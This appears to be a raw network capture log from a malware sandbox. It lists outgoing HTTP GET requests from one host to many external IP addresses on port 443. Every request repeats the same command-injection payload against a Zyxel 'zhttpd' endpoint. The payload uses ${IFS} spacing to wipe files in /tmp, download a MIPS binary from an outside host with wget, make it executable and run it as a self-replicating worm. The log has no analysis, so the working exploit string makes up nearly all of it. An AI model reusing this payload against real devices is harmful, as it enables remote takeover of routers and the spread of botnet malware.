                                            Jan 14, 2024 15:50:55.743148088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8715192.168.2.2349498151.46.20.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743174076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8716192.168.2.2351544188.148.50.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743216038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8717192.168.2.2349934119.22.74.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743253946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8718192.168.2.2358768120.16.127.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743324995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8719192.168.2.2349926149.8.104.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743355036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8720192.168.2.2336618185.158.222.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743376970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8721192.168.2.2335478212.182.187.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743421078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8722192.168.2.2335694155.27.12.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743501902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8723192.168.2.2354130172.205.146.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743522882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8724192.168.2.233494846.83.16.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743582964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8725192.168.2.233873860.140.238.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743627071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8726192.168.2.2347560223.199.255.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743634939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8727192.168.2.2337292205.35.104.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743683100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8728192.168.2.2334544189.53.50.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743705988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8729192.168.2.234693476.172.60.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743756056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8730192.168.2.2350732163.198.48.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743789911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8731192.168.2.2333526203.153.162.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743870020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8732192.168.2.235135419.213.51.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743906975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8733192.168.2.236075464.203.228.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743974924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8734192.168.2.2342830103.6.0.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744035006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8735192.168.2.235746690.188.148.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744055986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8736192.168.2.2351422158.101.16.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744102955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8737192.168.2.2334316216.33.29.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744163036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8738192.168.2.2347390117.53.113.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744187117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8739192.168.2.2355286198.89.72.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744210958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8740192.168.2.2351382121.147.207.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744266033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8741192.168.2.2350256110.87.243.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744338036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8742192.168.2.234253634.139.136.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744390965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8743192.168.2.233652667.98.27.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744410038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8744192.168.2.2342846126.38.0.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744452953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8745192.168.2.233685857.205.74.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744529963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8746192.168.2.235755213.145.201.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744574070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8747192.168.2.233380648.134.1.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744626999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8748192.168.2.2343958119.197.143.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744674921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8749192.168.2.2352198216.229.40.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744730949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8750192.168.2.2354422208.100.24.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744793892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8751192.168.2.2338542111.238.218.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744801044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8752192.168.2.2342432148.163.130.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744854927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8753192.168.2.2344336206.44.99.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744910002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8754192.168.2.23443665.129.15.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744923115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8755192.168.2.234637488.138.107.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.744991064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8756192.168.2.2334858121.237.3.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745028973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8757192.168.2.2349706106.146.134.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745098114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8758192.168.2.235628457.242.252.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745129108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8759192.168.2.2346894135.110.176.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745166063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8760192.168.2.234563075.102.188.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745218992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8761192.168.2.2341424131.163.5.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745246887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8762192.168.2.2359020176.125.7.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745285034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8763192.168.2.2352604205.86.77.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745357990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8764192.168.2.2339734154.183.159.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745410919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8765192.168.2.2335356201.110.73.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745433092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8766192.168.2.233699467.83.122.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745490074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8767192.168.2.2342908137.87.211.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745522022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8768192.168.2.2346452156.193.136.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745579004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8769192.168.2.2355838122.205.35.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745640039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8770192.168.2.234043486.152.34.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745677948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8771192.168.2.2343188179.144.242.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745732069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8772192.168.2.233838675.200.230.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745768070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8773192.168.2.2334160191.12.6.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745816946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8774192.168.2.2343278217.208.42.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745852947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8775192.168.2.235504613.203.72.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745912075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8776192.168.2.234852213.31.108.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.745960951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8777192.168.2.2335718183.241.21.64443
                                            TimestampBytes transferredDirectionData
